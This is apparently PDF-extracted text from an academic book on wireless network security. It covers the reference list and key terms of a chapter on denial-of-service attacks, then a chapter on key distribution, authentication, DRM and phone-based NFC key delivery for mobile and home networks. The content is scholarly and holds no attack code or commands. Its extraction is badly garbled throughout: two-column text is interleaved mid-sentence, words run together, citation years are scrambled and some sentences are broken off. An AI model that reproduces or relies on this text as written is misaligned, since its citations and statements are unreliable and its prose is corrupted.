of defense mechanisms that could help against Auerbach Publications, Taylor & Francis Group.
such attacks.
nesses in the key scheduling algorithm of RC4.
Retrieved July 25, 2005, from http://downloads.
rEfErEncEs
securityfocus.com/ library/rc4_ksaproc.pdf
Agarwal, S., Dawson, T., & Tryfonas, C. (2003). Fontana, J. (2007). Network World. Retrieved
DDoS mitigation via regional cleaning centers April 5, 2007, from http://www.networkworld.
(Tech. Rep. No. RR04-ATL-013177). Sprint ATL com/news/2007/011907-microsoft-secure-vpn-
Research Report. tunneling-protocol.html
Blunk, L., & Vollbrecht, J. (1998). PPP extensible Gast, M. (2002). 802.11 wireless networks—The
authentication protocol (EAP) (RFC 2284). Re- definitiveguide. CA: O’Reilly Media.
trieved December 25, 2006, from http://www.ietf.
org/rfc/rfc2284.txt Greenhalgh, A., Handley, M., & Huici, F. (2005).
Using routing and tunneling to combat DoS attacks.
Cable, G. (2004). Wi-Fi protected access data In ProceedingsoftheWorkshop 502 onStepsto
encryption and integrity. Retrieved December ReducingUnwantedTrafficontheInternet.
17, 2006, from http://www.microsoft.com/technet/
community/columns /cableguy/cg1104.mspx Held, G. (2003). Securing wireless LAN. Sussex,
England: John Wiley & Sons.
Cam-Winget, N., Housley, R., Wagner, D., &
Walker,Security
J..) 302 ( aws
fl indata
1 .2 0 8 link Hurton, M., & Mugge, C. (2003). Hack notes—Net-
protocols. Communications of the ACM, 35-39. work security portable reference. CA: McGraw-
Hill/Osborne.
Christos, D., & Aikaterini, K. (2003). DoS attacks
anddefensemechanism:Classifications In-Stat. (2006). In-stat market survey. Retrieved
andstate-
of-the-art. Computer Networks, 44, 643-666. May 11, 2007, from http://www.in-stat.com

Issac, B., Jacob, S. M., & Mohammed, L. A. (2005). http://www.wi-fiplanet.com/tutorials/article.

The art of war driving—A Malaysian case study. php/3667586
In Proceedings of IEEE International Conference
Richard, W. (2005). VoiceoverwirelessLAN - adop
on Networks (ICON) (pp. 124-129).
tion triples by 2007. Retrieved January 05, 2007,
Kandula, S., Katabi, D., Jacob, M., & Berger, A. from http://www.infonetics.com/resources/purple.
(2005). Botz-4-sale: Surviving organized DDoS shtml?upna0wl. . 5 nr.shtm
attacks that mimic ash fl crowds. In
Proceedings
Shields, C. (2002). What do we mean by network
of the 2nd Symposium on Networked Systems and
denialofservice? In
Proceedings of the 2002 IEEE
Design and Implementation.
workshop on Information Assurance (pp. 196-203).
Lynn, M., & Baird, R. (2002). Advance 802.11 U.S. Military Academy.
attack, Blackhat 2002. Retrieved June 19, 2006,
Strand, L. (2004). 802.1x port-based authentication
from http://www.blackhat.com/html/bh-usa-02/
HOWTO. Retrieved July 15, 2005, from http://www.
bh-usa-02-speakers.html#baird
tldp.org/HOWTO/8021X-HOWTO
Marti, S., Giuli, T., Lai, K., & Baker, M. (2001).
Takahashi, T. (2004). WPA passive dictionary at-
Mitigating routing behavior in mobile ad hoc net-
tack overview (White Paper).
works. In Proceedings of Mobicom, Rome.
Yih-Chun, H. (2006). Wormhole attacks in wire-
Mohammed, L. A., & Issac, B. (2005). DoS attacks
less networks. IEEE Journal on Selected Areas in
and defense mechanisms in wireless networks. In
Proceedings of the IEE Mobility Conference (Mo-
bility, ) 502 Guangzhou, China (pp. P2-1A).
Additional Important Links/References:
Papadimitratos, P., & Haas, Z. J. (2002). Secure
routing for mobile ad hoc networks. In Proceed-
CERT Coordination Center References
ings of the SCS Communication Networks and
Distributed Systems Modeling and Simulation
Conference (CNDS 2002), San Antonio, TX. http://www.cer t.org/advisories/CA -2000-
11.html
Park, K., & Lee, H. (2001). On the effectiveness
ofroute-basedpacketfilteringfordistributed DoS
http://www.cert.org/research/JHThesis/Chapter11.
attack prevention in powerless Internet. In Pro- html
ceedings of the ACM SIGCOMM_01 Conference
on Applications, Technologies, Architectures, and http://www.cert.org/incident_notes/IN-2000-
Protocols for Computer Communications (pp. 15- 04.html
26) New York: ACM Press. http://www.cert.org/tech_tips/denial_of_service.
Paul, C., Ben, C., & Steven, B. (2003). Security+ html
guide to network security fundamentals. Thomson http://www.cert.org/archive/pdf/DoS_trends.pdf
Course Technology (pp. 47-84).
http://www.cert.org/research/isw/isw2000/pa-
Perrig, A., Canetti, D., Tyger, D., & Song, D. (2000). pers/42.pdf
Efficientauthenticationandsignatureofmulticast
the IEEE Symposium on Security and Privacy Other links
(pp. 90-100).
http://www.kb.cert.org/vuls/
Phifer, L. (2007). WPA PSK crackers: Loose
lips sink ships. Retrieved April 2, 2007, from http://www.usenix.org/publications/login/2000-
7/apropos.html

http://www.iss.net traffic on the network for consuming server’s or

network’s resources.
http://www-1.ibm.com/services/continuity/re-
cover1nsf/
. files/Downloads/file/
$ DOS.pdf Information Security: Information security
isamechanismdealingwithproviding - confiden
http://www.cymru.com/~robt/Docs/Articles/dos-
tiality, integrity, authentication, and non-repudia-
and-vip.html
tion.
Network Security: Network security is a
kEy tErMs mechanism dealing with protection of the network-
ing system as a whole and sustaining its capability
Denial of Service (DoS): Denial of service are to provide connectivity between the communicat-
attacks to prevent legitimate users from receiving ing entities.
services from the service provider.
Spoofing Attack: Spoofingattackinvolvesthe
Distributed Denial of Service (DDOS): creation of packets with a forged or faked source
DDOS is a type of DoS attack conducted by using IP addresses.
the network. Wireless Networks: Wireless networks are
based on a technology that uses radio waves or
Flooding Attack: Flooding attack involves radio frequencies to transmit or send data.
the generation of spurious messages to increase

Chapter XI
Key Distribution and
Management for
Mobile Applications
György Kálmán
Josef Noll
AbstrAct
This chapter deals with challenges raised by securing transport, service access, user privacy, and ac-
counting in wireless environments. Key generation, delivery, and revocation possibilities are discussed
andrecentsolutionsareshown.Specialfocusisonefficiencyandadaptationtothemobil
Device domains in personal area networks and home networks are introduced to provide personal digital
rights management (DRM) solutions. The value of smart cards and other security tokens are shown and
asecureandconvenienttransmissionmethodisrecommendedbasedonthemobilephone
communication technology.
A ProblEM of MEdIA AccEss already by transport layer encryption or deploying

shieldedtwistedpairSTP) ( orevenfibre.
On the dawn of ubiquitous network access, data New technologies emerged in the wireless
protection is becoming more and more important. world, and especially the IEEE 802.11 family has
While in the past network connectivity was mainly drastically changed the way users connect to net-
provided by wired connections, which is still con- works. The most basic requirements for new devices
sidered the most secure access method, current and are the capability of supporting wireless service
future users are moving towards wireless access access. The mobile world introduced general
and only the backbone stays connected by wires. packet radio service (GPRS) and third generation
In a wired environment, eavesdropping is existent, (3G) mobile systems provide permanent IP con-
but not as spread and also not easy to implement. nectivity and provide together with Wi-Fi access
While methods exist to receive electromagnetic points continuous wireless connectivity. Besides
radiation from unshielded twisted pair (UTP) communications devices such as laptops, phones,
cables, a quite good protection can be achieved also cars, machines, and home appliances nowadays
come with wireless/mobile connectivity.
Protecting user data is of key importance for is authenticated, the user has to trust the network
all communications, and especially for wireless unconditionally. In universal mobile telecommu-
communications, where eavesdropping, man-in- nications system (UMTS), strong encryption is
the-middle, and other attacks are much easier. applied on the radio part of the transmission and
With a simple wireless LAN (WLAN) card and provides adequate security for current demands,
corresponding software it is possible to catch, but does not secure the transmission over the
analyse, and potentially decrypt wireless backbone.traffic.
UTMS provides mutual authentication
The implementation of the first WLAN - encryp
through an advanced mechanism for authentication
tion standard wired equivalent privacy (WEP) and session key distribution, named authentication
had serious weaknesses. Encryption keys can be and key agreement (AKA).
obtained through a laptop in promiscuous mode
in less than a minute, and this can happen through
a hidden attacker somewhere in the surrounding. A long wAy to sEcurE
Data protection is even worse in places with public coMMunIcAtIon
access and on factory default WLAN access points
without activated encryption. Standard Internet Applying some kind of cryptography does not im-
protocols as simple mail transport protocol (SMTP) ply a secured access. Communicating parties must
messages are not encoded, thus all user data are negotiate the key used for encrypting the data. It
transmitted in plaintext. Thus, sending an e-mail should be obvious that the encryption key used for
over an open access point has the same effect as the communication session (session key) cannot be
broadcasting the content. With default firewall
sent over the air in plaintext (see Figure 1).
settingsanintruderhasaccesstolocal Inordersince
files, toenableencryptionevenforthefirst
the local subnet is usually placed inside the trusted message, several solutions exist. The simplest
zone. These examples emphasise that wireless links one, as used in cellular networks is a preshared
needsomekindoftrafficencryption. key supplied to the mobile terminal on forehand.
Whenthefirstwidespreaddigital - cellular
This key cannet be used later for initialising of the
work was developed around 1985, standardisation security infrastructure and can act as a master key
of the global system for mobile communication in future authentications.
(GSM) introduced the A5 cryptographic algo- In more dynamic systems the use of preshared
rithms, which can nowadays be cracked in real-time keys can be cumbersome. Most of WLAN encryp-
(A5/2) or near real-time (A5/1). A further security tion methods support this kind of key distribution.
threat is the lack of mutual authentication between The key is taken to the new unit with some kind of
the terminal and the network. Only the terminal out of band method, for example with an external
unit, as indicated in Figure 2. Practically all pri-
vate and many corporate WLANs use static keys,
allowing an eavesdropper to catch huge amounts
Figure 1. A basic problem of broadcast environ- of traffic and thus enable easy decryption of the
ment content. This implies that a system with just a se-
cured access medium can be easily compromised.
Non-aging keys can compromise even the strongest
encryption, thus it is recommended to renew the
keys from time to time.
Outside the telecom world it is harder to distrib-
ute keys on forehand, so key exchange protocols
emerged, which offer protection from the first
message and do not need any preshared secret.
The most widespread protocol is the Diffie-Hell -

Figure2.(a)Diffie-Hellmannkeyexchangeand(b)out-of-bandkeydelivery
(a) (b)
man (DH) key exchange of Figure 2, which allows Two keys, a public and a private are generated.
two parties that have no prior knowledge of each The public key can be sent in plaintext, because
other to jointly establish a shared secret key over messages encrypted with the public key can only
an insecure communications channel. be decoded by the private key and vice versa. The
This protocol does not authenticate the nodes to two way nature of public keys makes it possible to
each other, but enables the exchange data, which authenticate users to each other, since signatures
can be decoded only by the two parties. Malicious generated with the public key can be checked with
attackers may start a man-in-the-middle attack the public key. Message authenticity can be guar-
(see Figure 4). Since this problem is well-known, anteed. Still, the identity of the node is not proven.
severalmodificationsenableidentity based
The DH,for
signature proves only that the message was
example Boneh, Goh, and Boyen (2005) showed encoded by the node, which has a public key of the
a hierarchical identity based encryption method, entity we may want to communicate with.
which is operating in fact as a public key system, Identity can be ensured by using certificates.
where the public key is a used chosen string. CertificateauthoritiesCA) ( storepublickeysan
Public key infrastructure (PKI) can help de- after checking the owner’s identity out of band,
fending corresponding parties against man-in-the- prove their identity by signing the public key
middle attacks. Public key cryptography is based and user information with their own keys. This
on the non polynomial (NP) time problems, for methodisrequiredforfinancialtransactionsa
example of factorisation or elliptic curves. business and government operations. Without a

Figure 3. Principle of a man-in-the-middle at- froM kEy ExcHAngE to AccEss

tack control InfrAstructurE
Mobility and wireless access introduced new

problems in network and user management, as
compared to fixed network installations with
for example, port-based access restrictions. The
network operators want to protect the network
against malicious intruders, charge the correct user
for the use, and provide easy and open access to
their valued services.
CA, the public keys can be gathered into a PKI, Thefirststeptogetaccesstoan-encryptednet
which provides an exchange service. Here, most workistonegotiatethefirstsessionkey.Thishas
commonly, a method called web of trust is used. A been solved in coordinated networks like mobile
number of nodes, who think that the key is authen- networks through pre-shared keys. Authentication
tic, submit their opinion by creating a signature. and access control is provided by central entities
The solution enables community or personal key to ensure operations.
management, with a considerable level of authen- In computer networks, which are not controlled
ticity protection. in such way and usually not backed-up by a cen-
While public keys can be sent, private keys must tral authorisation, authentication, and accounting
be kept secret. Although they are protected usually (AAA), different methods have been created for
with an additional password, this is the weakest connection control. The basic method is still to
point in the system. If the user saves a key in a negotiate encryption keys based on a preshared
program in order to enter the key automatically, secret. Typical preshared keys are a password for
security provided by the system is equal to the hash calculation, one time password sent via cell
security of the program’s agent application. Private phone or keys given on an USB stick.
firewallsandoperatingsystempoliciesusually There arewillseveral solutions to protect the
not stop a good equipped intruder. data transmitted over a wireless link. In private
Another security issue for terminals is the lack networks, security based on preshared keys is a
of tamper resistant storage. Usage of smart cards working solution. In corporate or public networks,
is a solution to this issue, but introduces additional a more robust solution is needed. The most promis-
hardware requirements. The lack of secure storing way is to integrate session key negotiation into
age is getting much attention in DRM schemes. the AAA process. Since providers or companies
Most DRM schemes use a software-based method, have to identify the connected user, they rely on
but also hardware-assisted ones have lately been an AAA infrastructure and have an encryption
introduced. of user credentials as compulsory policy. A cer-
All these authentication methods, secure stor- tificate-based medium access control and AAA
age and rights management support secure data system is advised, where AAA messages can
exchange, but they do not protect the privacy of carry also the certificates needed to secure t
usercredentials,preferences,andprofiles. messageAd hoc
exchange.
networks, like personal area networks (PANs), As public key operations induce a lot of network
whichmovearoundandaredynamicallyconfigured traffic,thenegotiatedsessionkeyshavetobeuse
open for intrusion attacks on the privacy. in the most efficient way. Encryption protocols
Thus, protection of user credentials in wireless designed for wired environments, like transport
environments is one of the focal points of current layer security (TLS) do not consider problems
research.Beforeaddressingprivacy,we willfirst
associated with the broadcast transmissions and
summarise issues in key management protocols. limitations of mobile devices. In a wired, or at

Figure 4. TLS key negotiation data transferred over the radio interface beside the
high computing power needs.
In environments with limited resources, au-
thentication and identity management based on
preshared keys is still the most effective solution.
Badra and Hajjeh (2006) propose an extension to
TLS, which enables the use of preshared secrets
instead the use of asymmetric encryption. This is
in line with the efforts to keep resource needs at
the required minimum level in mobile devices. A
preshared key solution was also proposed by the
3rd Generation Partnership Projects (3GPP, 2004)
and (3GPP2, 2007) as an authentication method
for wireless LAN interworking. The problem with
the proposed solution is preshared keys does not
provide adequate secrecy nor identity protection in
Internet connections. To deal with this problem, the
Figure5.TLS-KEMkeynegotiation TLS-key exchange method (TLS-KEM) provides
identity protection, minimal resource need, and
full compatibility with the original protocol suite
as seen in Figure 6.
In direct comparison, the public key based
TLSneedsalotmorecomputing,datatraffic,and
deployment effort.
In UMTS networks, an array of authentication
keys is sent to the mobile in authentication vec-
tors. In the computer world a good solution would
be using hash functions to calculate new session
keys, as these consume low power and require
little computing.
A moving terminal can experience a commu-
nication problem, as the overhead caused by key
negotiation might extend the connection time to a
network node. A preserved session key for use in
the new network is a potential solution in a mobile
leastfixedenvironment,computational costofkey
environment, as it speeds up the node’s authentica-
negotiations is usually neglected. For example TLS tion. Lee and Chung (2006) recommend a scheme,
is using several public key operations to negotiate which enables to reuse of session keys. Based on
a session key. This can be a problem for mobile the AAA infrastructure, it is possible to forward
devices, since computational cost is much higher the key to the new corresponding AAA server on
in asymmetric encryption. The standard TLS suite a protected network and use it for authentication
uses lots of cryptographic operations and gener- without compromising system security. This can
ates a too large message load on wireless links reduce the delay for connecting, and also reduces
(see Figure 5). the possibility of authentication failure. Since the
If a mobile device wants to execute mutual old session key can be used for authenticating the
authentication with a service provider, with cer- node towards the new AAA server, connection
tificate exchanges, it can lead to big amounts to the homeofAAA is not needed any more. The

messages are exchanged as follows (Lee & Chung, mances for public key based mechanisms (Lim,
2006): when sending the authorisation request to Lim, & Chung, 2006). Mobile IPv4 uses symmet-
the new network, the node also includes the old ric keys and hashes by default. Since symmetric
network address it had. The foreign agent connects keys are hard to manage, a certificate-based key
to the new local AAA server and sends an authen- exchange was recommended, but this demands
tication request. The new AAA server connects more resources. To lower the resource demand, a
to the old one sending a message to identify the composite architecture was recommended (Sufa-
user. The old AAA authenticates the message by trio,.) 9The
1 procedure uses certificates only
checking the hash value included, and generates a in places where the terminal does not require
nonce for the terminal and the foreign agent. The processing of the public key algorithm and does
server composes an AAA-terminal answer, which notrequirestorageofthecertificate.
is composed from a plain nonce, an encrypted nonce The result of the comparison shows that hash
using the key shared between the old foreign agent isbyfarthemostefficientmethodintermsofkey
and the terminal. Then the whole message is signed generation,butsuffersfrommanagement - difficul
and encrypted with the key used between the two ties. Lim et al. (2006) also demonstrates that a pure
AAA servers. When the new AAA receives it, certificate-based authentication is unsuitab
decrypts and sends the message to the new foreign mobileenvironments.Partialuseofcertificatesa
agent. Based on the plain nonce, the agent generates identity-based authentication with extensive use of
the key and sends down the reply, which includes hash functions can be a potential way ahead.
also the nonce encrypted by the old AAA. After
the authentication of the user towards the network,
the user can start using services. AutHEntIcAtIon of dEvIcE
Key distribution and efficiency- in grouPs e- com
merce applications is another important aspect.
The network’s AAA usually does not exchange In a ubiquitous environment, moving networks
information with third parties or can not use the appear. PANs and ad hoc connections based on
authentication data of the network access because various preferences emerge and fall apart. These
of privacy issues. Current security demands require devices communicate with each other and have
mutualidentificationofcommunicating parties
usually in
very limited capabilities in terms of
an e-commerce application. This can easily lead computing power and energy reserves. In order
to compromising the customer to companies (for to provide secure communication between any
example in a GSM network, the user has to trust part of the network, hierarchical key management
the network unconditionally). If the user can also methods emerged (Kim, Ahn, & Oh, 2006). Here
check the identity of the service provider, at least a single trusted server is used to manage the group
man-in-the-middle attacks are locked out. key. These entities are usually storing the keys in
When a user starts a new session with a service a binary tree, where nodes are the leaves.
provider, this session should be based on a new Public key operations are usually required
key set. The session key has to be independent when a terminal wants to connect to a group for
from the previous one in means of traceability thefirsttime.Agroupmanagementsystemneeds
and user identity should not be deductible from frequent key generation rounds, because it has to
the session key, thus ensuring user privacy. For ensure forward and backward secrecy. Strict key
mutual identification, a key exchange method management ispolicies ensure that no new node is
proposed by Kwak, Oh, and Won (2006), which capableofdecodingformertrafficandnoneofthe
uses hash values to reduce resource need. The key old nodes have the possibility to decrypt current
calculation is based on random values generated traffic.Toadjustresourceusageto-mobileenviron
by the parties, which ensures key freshness. ment, a management scheme which uses mainly
The use of hash functions is recommended in simple operations like XOR and hash is advisable
mobile environments, providing better perfor- (Kim et al., 2006). As the key in the root of the
0
Figure6.Keysinabinarytree 2005). Network-capable multimedia devices, media

players, game consoles, and digital set-top boxes
are widespread and part of the digital entertain-
ment era. Content is stored within this network,
and provided through the Internet to other users.
Since the birth of peer-to-peer (P2P) networks,
such technologies are in the crosshair of content
providers. Recently, some software developers and
a few musicians started using the torrent network
for cost effective delivery of their content. A digi-
tal rights management method designed for such
binary tree is used to authenticate the whole group,
network is still missing.
keys need to be regenerated when a node leaves
Current right protection solutions are not com-
the network. This procedure is starting from the
patible with each other and the user friendliness is
parent of the former node and goes up to the root.
also varying. The basic problem is, that just a very
Then the management unit sends out the new keys
few devices are equipped with tamper resistant
in one message. Building a tree from keys ensures
storage and integrated cryptographic capabilities.
fast searches and a simple, clean structure. In addi-
Beside software solutions, which are meant as
tion, all keys in the internal nodes are group keys
weak solutions, hardware-based encryption can
for the leaves under them. So a subset of devices
severely limit the lawful use of digital content.
can be easily addressed.
Recent lawsuits related to Sony’s rootkit protec-
The root unit has to compute these keys in
tion mechanism also reveals that customer rights
acceptable time, requiring a more complex ar-
of usage is considered to be more important than
chitecture. In PANs this is usually not a problem,
the legitimate wish of content providers to protect
but when a member of a larger subnet is leaving,
the content.
calculations could be more demanding. A standard
Trusted platform modules (TPM) are the most
group key handling method is the Tree-based Group
likely candidate for content protection in hard-
Diffie-Hellman(TGDH)where, managementsteps
ware-based solutions. While providing encryption
assume that all nodes have the same processing
capabilities, it is very likely that these components
capabilities. To ensure maximal efficiency, the
will be used to dispose the users’ right to decide
highest performance unit shall be the one in the
over the user’s own resources.
root of the tree (Hong & Lopez-Benitez, 2006).
The current discussions on DRM for audio
When node computing capabilities are showing big
content are regarded as minor when compared to
differences, the overhead caused by tree transfor-
highdefinition(HD)contentprotection.Eventhe
mations does not represent a drawback.
connection to the screen has to use strong encryp-
Another significant group of devices that
tion, which has to exceed GSM/UMTS encryption
need encryption can be found in home networks,
in order to be acceptable for content providers.
where the focus is on management of content and
Enforcing a digital, end-to-end encrypted stream
personal data.
means that a HD-TV purchased at the end of 2006
may not work with the new encryption standards
for HD. There is no current solution for comput-
sEcurE HoME nEtwork And ers to legally play full resolution HD. By the end
rIgHts MAnAgEMEnt of 2006 it was announced, that a workaround is
arising to deal with the advanced content protec-
Deployment of wired or wireless home networks tion system of HD.
happens in roughly 80% of all households with A more discrete, but not intrusive business
broadband access (Noll, Ribeiro, & Thorsteinsson, model discussion for digital content management

is presented in order to visualise the requirements KálmánandNollrecommend

0 2 6) ( aphone-
of this market. Apple’s FairPlay enables making based solution. This represents a good trade-off
backup copies of audio tracks, which is permitted between user experience and content protection.
by law in several European countries, and copy The phone is practically always online, most of
of content between the user’s iPod players. This them have Bluetooth or other short range radio
solution is considered being to open for some transmitters, so licenses can be transmitted on
content providers, and the distribution is limited demand. Since the phone has a screen and a
to a server-client infrastructure. For HD content keyboard, it is possible to request authorisation
with high bandwidth needs such a server-client from the user before every significant message
infrastructure is not advisable, both from a server exchange, so the user can control the way licenses
and network point of view. The ever growing size are distributes.
of P2P networks form a perfect infrastructure to If we look aside the issues related to busi-
deliver content with high bandwidth need practi- ness aspects, computational issues still remain.
cally without substantial transmission costs. P2P Highly secure DRM entities will use asymmetric
networks are usually run without any DRM support. encryptionandcertificates.SurandRhee026)(
An additional infrastructure supporting DRM in a recommend a device authentication architecture,
P2P network used to transmit content will enable which eliminates traditional public key operations
high volume distribution of digital content (Pfeifer, except the ones on the coordinator device. This is
Savage, Brazil, & Downes, 2006). If seamless achieved by using hash chains including the permis-
license delivery and user privacy could be guar- sion, for example, a device can get keys to play a
anteed, such a network could be the foundation of designated audio track ten times or permission to
a low cost content delivery scheme. usefivedailypermitsondemand.Suchschemes
While the usage of P2P networks is an excel- allow end devices to be simpler and lower network
lent idea, the recommended solution proposed by communication overhead.
Nützel and Beyer (2006) is similar to the Sony’s If a central device is not appreciated, a com-
rootkit solution: It bypasses the user control and posite key management scheme may be used. The
is thus not acceptable. While the primary goal is parties in the PAN will form a web of trust like in
to secure content, the software used in such solu- aconfidentialityscheme,forexample,prettygood
tions acts like hidden Trojans and opens backdoors privacy (PGP). In this web, the main key is split
not only for the content providers, but also other between nodes and cooperation is needed for sig-
hackers. nificantoperations.Thismeansthatifthescheme
Content usage across platforms is not supported is operating on a (k, n) basis, k-1 nodes can be lost
yet, as a common standard does not exist. Pfeifer before the system needs to be generate a new key.
et al. (2006) suggests a common management Fu, He, and Li (2006) mention the problem of the
platform for DRM keys with an XML-based, PAN’s ad hoc nature as the biggest problem. Since
standard MPEG-REL framework. Users will also this scheme selects n nodes randomly, the ones
produce content with digital protection, in order to that are moving between networks fast can cause
ensure that personal pictures cannot be distributed instability in the system. Also, the resource need of
electronically. Social networks and groups of inter- this proposal is quite high on all nodes present.
est, as well as distribution of content in PANs is a When a scheme is enabling off-line use of
challenge for DRM development. Zou, Thukral, license keys, attention should be given to prob-
and Ramamurthy (2006) and Popescu, Crispo, lems arising from leaving or compromised nodes.
Tanenbaum, and Kamperman (2004) propose a Identity-based schemes become popular recently
key delivery architecture for device groups, which because of their efficiency in key distribution.
could be extended by a local license manager. The main drawback is that these proposals do not
The central key management unit could distribute provide a solution for revocation and key renewal.
licenses seamlessly to the device, which wants to Hoeper and Gong (2006) propose a solution based
get access, without invading user experience. on a heuristic (z, m) method. The solution is similar

to the threshold scheme shown before, but enables and SIM cards with enhanced encryption ca-
key revocation. If z nodes are accusing one node pabilities. The SIM and USIM modules used in
to be compromised, based on their own opinion, GSM/UMTS are quite capable smart cards. They
the node is forced to negotiate a new key. If a node offer protected storage with the possibility of over
reaches a threshold in number of regenerations in a the air key management, good user interface, and
time period, it could be locked out, since most likely standard architecture. Danzeisen, Braun, Rodel-
an intruder is trying to get into the system or the lar, and Winiker (2006) shows the possible use
internal security of the node is not good enough. of the mobile operator as trusted third party for
The assumptions about the system are strongly exchanging encryption keys out of band for other
limiting the effectiveness of the solution. The most networks.
stringent assumption is that they require to nodes to Delivery of the mobile phone key to a differ-
be in promiscuous mode. This can lead to serious ent device can be problematic, since most devices
energy problems. Another requirement is that there do not have a SIM reader, or it is inconvenient
has to be a unit for out-of-band key distribution. to move the SIM card from the mobile phone to
This unit could be the cellular phone. another device. New developments in near field
communication may overcome this and enable
short range secure key transfer.
sMArt cArds And cEllulAr
oPErAtors
brEAkIng tHE lAst cEntIMEtrE
boundAry
The use of smart cards has its roots in the basic prob-
lem of security infrastructures: even the most well
designed system is vulnerable to weak passwords. Frequency of authentication request is a key factor
A card, which represents a physical entity, can be in user acceptance. If a system asks permanently for
much easier protected compared to a theoretical new passwords or new values from the smart card
possession of a password. Smart cards integrate hash chain, it will not be accepted by the user. On
tamper resistant storage and cryptographic func- the other hand, if a device gets stolen and it asks
tions. They are usually initialised with a preshared for a password only when it is switched on, then
key and creating a hash chain, where values can a malicious person can impersonate the user for a
be used as authentication tokens. long time. A potential solution is to create a wear-
The remote authentication server is using the able token with some kind of wireless transmission
same function to calculate the next member. The technologyanddefinethedevicebehavioursuch
encryption key is the selection of a collision resis- that if the token is not accessible, it should disable
tant hash function. While the tokens they provide itselfintheverymomentofnotification.
are quite secure, a problem with smart cards is that Since the main challenge is not securing data
they represent a new unit that has to be present in transfer between the terminal and the network, but
order to enable secure communication, and user to authenticate the current user of the terminal, a
terminals must be equipped with suitable read- personal token has to be presented. As proposed
ers. The additional hardware does not only cause by Kálmán and Noll ,027)( the mobile phone
interoperability problems, but is usually slow, as a can be a perfect personal authentication token
measurement conducted shows (Badra & Hajjeh, if it is extended by a wireless protocol for key
This
.0 2 6 ) becomeseminentwhenhightrafficis distribution.
associated with asymmetric encryption; sending With the capabilities of user interaction,
a “hello” message with standard TLS to the smart network control of the mobile phone, it can be
cardneededseconds. 01 Incontrast,themodified ensured that critical operations will need user
TLS-KEM needed 1.5 s. presence by requiring PINs or passwords. Pos-
A user-friendly, seamless key delivery system sible candidates for key exchange are Bluetooth
can be created with the help of cellular operators

(BT),radiofrequencyidentification(RFID),and phones and a public key connected to that one.

Near Field Communications (NFC). NFC is a Based on this, DH key exchange would be possible
successor of RFID technology in very short range between terminals and the phone using the cellular
transmissions. BT is close to the usability limit, network as a gateway. An NFC-enabled phone could
since its transmit range reaches several meters. be the central element of a home DRM service, as
But the two later ones are promising candidates. it is online, capable of over the air downloads, and
Depending on the frequency, general RFID has still able to ensure user control.
a range of several meters while NFC operates in
the 0-10 cm range. NFC is recommended, as the
range alone limits the possibilities of eavesdroppers on tHE dAwn on PErsonAl
and intruders who want to impersonate the token contEnt MAnAgEMEnt
while it is absent. The use of repeaters in the case
of NFC, a so-called wormhole attack as described From the viewpoint of secure data transmission
by Nicholson, Corner, and Noble (2006), looks and user authentication, access and distribution of
not feasible because of the tight net of repeaters digital content can be ensured. Open issues remain
required. Also, the capability of user interaction for moving PANs and devices with limited capa-
provides an additional level of security. bility. Focus nowadays is on protecting the user’s
Mobile phones with integrated NFC functional- privacy. As usage of digital devices with personal
ity are already available and serve as user authen- information was limited, user privacy was not of
tication devices. To use these devices as tokens for primary concern for a long time. Since PANs and
other terminals, they have to be placed very close home networks hold a large amount of critical
to each other. This prevents accidental use in most personal data, this has to change (Jeong, Chung,
cases. To check presence of the token, heartbeat & Choo, 2006; Ren, Lou, Kim, & Deng, 2006).
messages might be introduced. By design, this In a ubiquitous environment users want to ac-
solution is very capable of distributing preshared cess their content wherever they are. This has to
keys for other devices out of band. Meaning, the be enabled in a secure manner. With upcoming
phone can get the keys from the cellular network social services, also fine grained access contro
from an identity provider and send it down to the methods have to be deployed inside the personal
appropriate device by asking the user to put the infrastructure. The focus of DRM research has to
devices close to each other for a second or two. shift towards the end user, who will also require the
Transmission of the key must be done only right to protect himself/herself and his/her content
when needed, so the programmable chip on the with the same strength as companies do.
phones has to be in a secured state by default and Extending the phone’s functions may be prob-
only activated by the user’s interaction. Protection lematic because of energy consumption and limited
of RFID tags is shown by Rieback, Gaydadjiev, computing power. This could be easily solved by
Crispo, Hofman, and Tanenbaum (2006), where a the technology itself, since a new generation of
proprietary hardware solution is presented. In case mobile terminals is arriving every half year. The
of a phone-based NFC key transmission, additional capacity and functionalities of the SIM cards will
active devices might be unnecessary to use, but be extended, the newest 3GPP proposals are pre-
for general privacy protection, IDs with RFID dicting high capacity and extended cryptographic
extensions must be treated with care. possibilities.
Transmissionofcertificateswould - not needadlegal aspects, extending the SIM
Regarding
ditional encryption over the NFC interface, while possibilities may cause some concern, since the
other keys may require a preshared key between SIM cards are currently owned by the network
the phone and the terminals, which can be done operators.
via a wired method or by the phone provider. Most
providers have at least one secret key stored on

conclusIon Badra, M., & Hajjeh, I. (2006). Key-exchange au-

thentication using shared secrets. IEEE Computer
Transport encryption and authentication of devices Magazine,93 (3), 58-66.
has been the subject of research for a long time and
Boneh, D., Goh, E.-J., & Boyen, X. (2005). Hierar-
resultedinsufficientsecuresolutionswithcurrent
chical identity based encryption with constant size
technologies. The focus in recent proposals is on
ciphertext. In ProceedingsofEurocrypt’0.5
the limited possibilities of mobile terminals and
adoption of encryption technologies for mobile Danzeisen, M., Braun, T., Rodellar, D., & Winiker,
and wireless links. S. (2006). Heterogeneous communications enabled
Distributing keys between nodes is solved, by cellular operators. IEEEVehicularTechnology
except for the first step, which usually requires
Magazine, 1(1), 23-30.
out-of-band transmissions. A solution for this
Fathi, H., Shin, S., Kobara, K., Chakraborty, S.
initial key distribution might be the mobile phone
S., Imai, H., & Prasad, R. (2006). LR-AKE-based
with its integrated smart card and already exist-
AAA for network mobility (NEMO) over wireless
ing communication possibility. As phones come
links. IEEE Selected Areas in Communications,
with NFC, they may act as contact-less cards to
24(9), 1725-1737.
distribute keys between devices.
While device authentication is handled suf- Fu, Y., He, J., & Li, G. (2006). A composite key
ficiently,useridentityishardto-prove. Aknowlscheme for mobile ad hoc networks.
management
edge-based password or PIN request is not a In On the move to meaningful Internet systems,
user-friendly solution. Current proposals tend to be OTM026Workshops (LNCS 4277).
insecure when performing the trade-off between
user experience and security. Hoeper, K., & Gong, G. (2006). Key revocation
Focus on research should be paid towards perfor identity-based schemes in mobile ad hoc
sonal area and home networks. These networks hold networks, ad-hoc, mobile, and wireless networks
most of the user’s personal private data and content, (LNCS 4104).
either purchased or created by the user. Currently Hong, S., & Lopez-Benitez, N. (2006). Enhanced
no standard solution exists for managing content group key generation algorithm. In Network 10th
rights or for access control of own content. IEEE/IFIP Operations and Management Sympo-
sium,NOMS026 (pp 1-4).
rEfErEncEs Jeong, J., Chung, M. Y., Choo, H. (2006). Secure

user authentication mechanism in digital home
